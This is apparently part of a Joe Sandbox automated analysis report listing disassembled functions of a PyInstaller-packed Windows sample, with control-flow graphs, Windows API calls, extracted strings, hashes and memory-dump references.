                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC816F73A0C68686EB61DB2CD0412BD23A1FF88788F444535EB8DC7BA5EE3CE5858741
                                                                                                                                                                                                                                              Function 00007FF6B7501600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 409 7ff6b7501600-7ff6b7501611 410 7ff6b7501613-7ff6b750161c call 7ff6b7501050 409->410 411 7ff6b7501637-7ff6b7501651 call 7ff6b75045c0 409->411 418 7ff6b750162e-7ff6b7501636 410->418 419 7ff6b750161e-7ff6b7501629 call 7ff6b7502710 410->419 416 7ff6b7501653-7ff6b7501681 call 7ff6b7514f08 call 7ff6b7502910 411->416 417 7ff6b7501682-7ff6b750169c call 7ff6b75045c0 411->417 426 7ff6b750169e-7ff6b75016b3 call 7ff6b7502710 417->426 427 7ff6b75016b8-7ff6b75016cf call 7ff6b75106d4 417->427 419->418 435 7ff6b7501821-7ff6b7501824 call 7ff6b751004c 426->435 433 7ff6b75016d1-7ff6b75016f4 call 7ff6b7514f08 call 7ff6b7502910 427->433 434 7ff6b75016f9-7ff6b75016fd 427->434 448 7ff6b7501819-7ff6b750181c call 7ff6b751004c 433->448 437 7ff6b75016ff-7ff6b750170b call 7ff6b7501210 434->437 438 7ff6b7501717-7ff6b7501737 call 7ff6b7514f44 434->438 443 7ff6b7501829-7ff6b750183b 435->443 445 7ff6b7501710-7ff6b7501712 437->445 449 7ff6b7501761-7ff6b750176c 438->449 450 7ff6b7501739-7ff6b750175c call 7ff6b7514f08 call 7ff6b7502910 438->450 445->448 448->435 451 7ff6b7501802-7ff6b750180a call 7ff6b7514f30 449->451 452 7ff6b7501772-7ff6b7501777 449->452 463 7ff6b750180f-7ff6b7501814 450->463 451->463 455 7ff6b7501780-7ff6b75017a2 call 7ff6b751039c 452->455 464 7ff6b75017a4-7ff6b75017bc call 7ff6b7510adc 455->464 465 7ff6b75017da-7ff6b75017e6 call 7ff6b7514f08 455->465 463->448 471 7ff6b75017c5-7ff6b75017d8 call 7ff6b7514f08 464->471 472 7ff6b75017be-7ff6b75017c1 464->472 470 7ff6b75017ed-7ff6b75017f8 call 7ff6b7502910 465->470 477 7ff6b75017fd 470->477 471->470 472->455 474 7ff6b75017c3 472->474 474->477 477->451
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                              • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                              • Opcode ID: 7efa5df9256787d249526d0bd59650b0437ae4a7c3dc28480c0bb41e2e769eb3
                                                                                                                                                                                                                                              • Instruction ID: 1c666878ca6cd65b34c36de1c7d6d3058427205002bf00e49484db3ad9b5a93f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7efa5df9256787d249526d0bd59650b0437ae4a7c3dc28480c0bb41e2e769eb3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD519D63B0C64782EA10AB6994001B963A0BF84798F844535EF4CC7BF6EE3CF685C301
                                                                                                                                                                                                                                              Function 00007FF6B7508660 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetTempPathW.KERNEL32(?,?,00000000,00007FF6B7503CBB), ref: 00007FF6B7508704
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00007FF6B7503CBB), ref: 00007FF6B750870A
                                                                                                                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00007FF6B7503CBB), ref: 00007FF6B750874C
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7508830: GetEnvironmentVariableW.KERNEL32(00007FF6B750388E), ref: 00007FF6B7508867
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7508830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6B7508889
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7518238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B7518251
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7502810: MessageBoxW.USER32 ref: 00007FF6B75028EA
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                              • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                              • Opcode ID: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                                                                                                                                                              • Instruction ID: 0451fa2114ab74bd34c4994a820669fee330068cecfac1ec0c0dd47de738734d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 04418B13A1DA5244FA24AB69A8556F91390AF887C8F800131EF0DD7BFAEE3CF546C600
                                                                                                                                                                                                                                              Function 00007FF6B7501210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 601 7ff6b7501210-7ff6b750126d call 7ff6b750bd80 604 7ff6b750126f-7ff6b7501296 call 7ff6b7502710 601->604 605 7ff6b7501297-7ff6b75012af call 7ff6b7514f44 601->605 610 7ff6b75012d4-7ff6b75012e4 call 7ff6b7514f44 605->610 611 7ff6b75012b1-7ff6b75012cf call 7ff6b7514f08 call 7ff6b7502910 605->611 617 7ff6b7501309-7ff6b750131b 610->617 618 7ff6b75012e6-7ff6b7501304 call 7ff6b7514f08 call 7ff6b7502910 610->618 623 7ff6b7501439-7ff6b750144e call 7ff6b750ba60 call 7ff6b7514f30 * 2 611->623 619 7ff6b7501320-7ff6b7501345 call 7ff6b751039c 617->619 618->623 629 7ff6b7501431 619->629 630 7ff6b750134b-7ff6b7501355 call 7ff6b7510110 619->630 638 7ff6b7501453-7ff6b750146d 623->638 629->623 630->629 637 7ff6b750135b-7ff6b7501367 630->637 639 7ff6b7501370-7ff6b7501398 call 7ff6b750a1c0 637->639 642 7ff6b750139a-7ff6b750139d 639->642 643 7ff6b7501416-7ff6b750142c call 7ff6b7502710 639->643 644 7ff6b7501411 642->644 645 7ff6b750139f-7ff6b75013a9 642->645 643->629 644->643 647 7ff6b75013d4-7ff6b75013d7 645->647 648 7ff6b75013ab-7ff6b75013b9 call 7ff6b7510adc 645->648 649 7ff6b75013ea-7ff6b75013ef 647->649 650 7ff6b75013d9-7ff6b75013e7 call 7ff6b7529e30 647->650 654 7ff6b75013be-7ff6b75013c1 648->654 649->639 653 7ff6b75013f5-7ff6b75013f8 649->653 650->649 658 7ff6b750140c-7ff6b750140f 653->658 659 7ff6b75013fa-7ff6b75013fd 653->659 655 7ff6b75013c3-7ff6b75013cd call 7ff6b7510110 654->655 656 7ff6b75013cf-7ff6b75013d2 654->656 655->649 655->656 656->643 658->629 659->643 661 7ff6b75013ff-7ff6b7501407 659->661 661->619
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                              • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                              • Opcode ID: 8f2f3123d1cabff2ad8e3db6a95d4b235f7cad2490955ba460222a7cf36d71df
                                                                                                                                                                                                                                              • Instruction ID: 7f9a54e1071fe5532483c2daa4c48b6f1c9070b51bd920409945892258ffb7f6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f2f3123d1cabff2ad8e3db6a95d4b235f7cad2490955ba460222a7cf36d71df
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA51B123A0C68685EA61AB1AA4403BE6391FF84798F484135EF4DC7BF5EE3CE546C700
                                                                                                                                                                                                                                              Function 00007FF6B751ED10 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF6B751F0AA,?,?,-00000018,00007FF6B751AD53,?,?,?,00007FF6B751AC4A,?,?,?,00007FF6B7515F3E), ref: 00007FF6B751EE8C
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF6B751F0AA,?,?,-00000018,00007FF6B751AD53,?,?,?,00007FF6B751AC4A,?,?,?,00007FF6B7515F3E), ref: 00007FF6B751EE98
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                              • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                              • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                              • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                              • Instruction ID: 1a252455fc8a62a46ca0f6c63a2c6b021a8bc9698c9119a396aa3725651b37a7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE41C763B1DA2245EA15DF1A98106752391BF49B92F89863DDF1DC7BB4EF3CE4858300
                                                                                                                                                                                                                                              Function 00007FF6B75036B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,00007FF6B7503804), ref: 00007FF6B75036E1
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF6B7503804), ref: 00007FF6B75036EB
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7502C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B7503706,?,00007FF6B7503804), ref: 00007FF6B7502C9E
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7502C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B7503706,?,00007FF6B7503804), ref: 00007FF6B7502D63
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7502C50: MessageBoxW.USER32 ref: 00007FF6B7502D99
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                              • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                              • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                              • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                              • Instruction ID: d60e2cf233a9c2584f606a4fd9246dd198f0468a1ff550510e47011322249933
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3214F63F1C64251FB219B2CE8153B62350BF99358F804136E75EC65F6EE2CE604C744
                                                                                                                                                                                                                                              Function 00007FF6B751BA5C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 746 7ff6b751ba5c-7ff6b751ba82 747 7ff6b751ba9d-7ff6b751baa1 746->747 748 7ff6b751ba84-7ff6b751ba98 call 7ff6b7514ee8 call 7ff6b7514f08 746->748 749 7ff6b751be77-7ff6b751be83 call 7ff6b7514ee8 call 7ff6b7514f08 747->749 750 7ff6b751baa7-7ff6b751baae 747->750 766 7ff6b751be8e 748->766 769 7ff6b751be89 call 7ff6b751a8e0 749->769 750->749 752 7ff6b751bab4-7ff6b751bae2 750->752 752->749 755 7ff6b751bae8-7ff6b751baef 752->755 758 7ff6b751bb08-7ff6b751bb0b 755->758 759 7ff6b751baf1-7ff6b751bb03 call 7ff6b7514ee8 call 7ff6b7514f08 755->759 764 7ff6b751bb11-7ff6b751bb17 758->764 765 7ff6b751be73-7ff6b751be75 758->765 759->769 764->765 770 7ff6b751bb1d-7ff6b751bb20 764->770 767 7ff6b751be91-7ff6b751bea8 765->767 766->767 769->766 770->759 773 7ff6b751bb22-7ff6b751bb47 770->773 775 7ff6b751bb49-7ff6b751bb4b 773->775 776 7ff6b751bb7a-7ff6b751bb81 773->776 779 7ff6b751bb4d-7ff6b751bb54 775->779 780 7ff6b751bb72-7ff6b751bb78 775->780 777 7ff6b751bb56-7ff6b751bb6d call 7ff6b7514ee8 call 7ff6b7514f08 call 7ff6b751a8e0 776->777 778 7ff6b751bb83-7ff6b751bbab call 7ff6b751d5fc call 7ff6b751a948 * 2 776->778 808 7ff6b751bd00 777->808 811 7ff6b751bbc8-7ff6b751bbf3 call 7ff6b751c284 778->811 812 7ff6b751bbad-7ff6b751bbc3 call 7ff6b7514f08 call 7ff6b7514ee8 778->812 779->777 779->780 781 7ff6b751bbf8-7ff6b751bc0f 780->781 785 7ff6b751bc8a-7ff6b751bc94 call 7ff6b752391c 781->785 786 7ff6b751bc11-7ff6b751bc19 781->786 797 7ff6b751bc9a-7ff6b751bcaf 785->797 798 7ff6b751bd1e 785->798 786->785 790 7ff6b751bc1b-7ff6b751bc1d 786->790 790->785 794 7ff6b751bc1f-7ff6b751bc35 790->794 794->785 799 7ff6b751bc37-7ff6b751bc43 794->799 797->798 803 7ff6b751bcb1-7ff6b751bcc3 GetConsoleMode 797->803 801 7ff6b751bd23-7ff6b751bd43 ReadFile 798->801 799->785 804 7ff6b751bc45-7ff6b751bc47 799->804 806 7ff6b751bd49-7ff6b751bd51 801->806 807 7ff6b751be3d-7ff6b751be46 GetLastError 801->807 803->798 809 7ff6b751bcc5-7ff6b751bccd 803->809 804->785 810 7ff6b751bc49-7ff6b751bc61 804->810 806->807 813 7ff6b751bd57 806->813 816 7ff6b751be48-7ff6b751be5e call 7ff6b7514f08 call 7ff6b7514ee8 807->816 817 7ff6b751be63-7ff6b751be66 807->817 818 7ff6b751bd03-7ff6b751bd0d call 7ff6b751a948 808->818 809->801 815 7ff6b751bccf-7ff6b751bcf1 ReadConsoleW 809->815 810->785 819 7ff6b751bc63-7ff6b751bc6f 810->819 811->781 812->808 822 7ff6b751bd5e-7ff6b751bd73 813->822 824 7ff6b751bcf3 GetLastError 815->824 825 7ff6b751bd12-7ff6b751bd1c 815->825 816->808 829 7ff6b751bcf9-7ff6b751bcfb call 7ff6b7514e7c 817->829 830 7ff6b751be6c-7ff6b751be6e 817->830 818->767 819->785 828 7ff6b751bc71-7ff6b751bc73 819->828 822->818 832 7ff6b751bd75-7ff6b751bd80 822->832 824->829 825->822 828->785 836 7ff6b751bc75-7ff6b751bc85 828->836 829->808 830->818 838 7ff6b751bda7-7ff6b751bdaf 832->838 839 7ff6b751bd82-7ff6b751bd9b call 7ff6b751b674 832->839 836->785 842 7ff6b751be2b-7ff6b751be38 call 7ff6b751b4b4 838->842 843 7ff6b751bdb1-7ff6b751bdc3 838->843 846 7ff6b751bda0-7ff6b751bda2 839->846 842->846 847 7ff6b751be1e-7ff6b751be26 843->847 848 7ff6b751bdc5 843->848 846->818 847->818 850 7ff6b751bdca-7ff6b751bdd1 848->850 851 7ff6b751be0d-7ff6b751be18 850->851 852 7ff6b751bdd3-7ff6b751bdd7 850->852 851->847 853 7ff6b751bdd9-7ff6b751bde0 852->853 854 7ff6b751bdf3 852->854 853->854 856 7ff6b751bde2-7ff6b751bde6 853->856 855 7ff6b751bdf9-7ff6b751be09 854->855 855->850 857 7ff6b751be0b 855->857 856->854 858 7ff6b751bde8-7ff6b751bdf1 856->858 857->847 858->855
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: bd5e670e2ac73c9d5051395424effa1a9c5fa8f9f080fcfac4df12f3bd03b0fb
                                                                                                                                                                                                                                              • Instruction ID: 43c8f9c447001a8a1015abfabceffc146aa3ecb77f293aab244723419772810e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd5e670e2ac73c9d5051395424effa1a9c5fa8f9f080fcfac4df12f3bd03b0fb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D3C1C123A0C6A792E6619F1D94402BD3BA0FB81F91F554235EB8E83BB1CE7CE8458700
                                                                                                                                                                                                                                              Function 00007FF6B7508570 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 995526605-0
                                                                                                                                                                                                                                              • Opcode ID: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                                                                                                                                                              • Instruction ID: c57e1a10fdde354a7423a654366036f6bc738cf8d5e9c1db24e7c3ad9794fc4e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 31216237A0C68242EB108B59F544A7AA3B0FF957A4F500235EBAD93BF4EE7CE4458700
                                                                                                                                                                                                                                              Function 00007FF6B75090E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7508570: GetCurrentProcess.KERNEL32 ref: 00007FF6B7508590
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7508570: OpenProcessToken.ADVAPI32 ref: 00007FF6B75085A3
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7508570: GetTokenInformation.KERNELBASE ref: 00007FF6B75085C8
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7508570: GetLastError.KERNEL32 ref: 00007FF6B75085D2
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7508570: GetTokenInformation.KERNELBASE ref: 00007FF6B7508612
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7508570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6B750862E
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7508570: CloseHandle.KERNEL32 ref: 00007FF6B7508646
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00007FF6B7503C55), ref: 00007FF6B750916C
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00007FF6B7503C55), ref: 00007FF6B7509175
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                              • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                              • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                              • Opcode ID: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
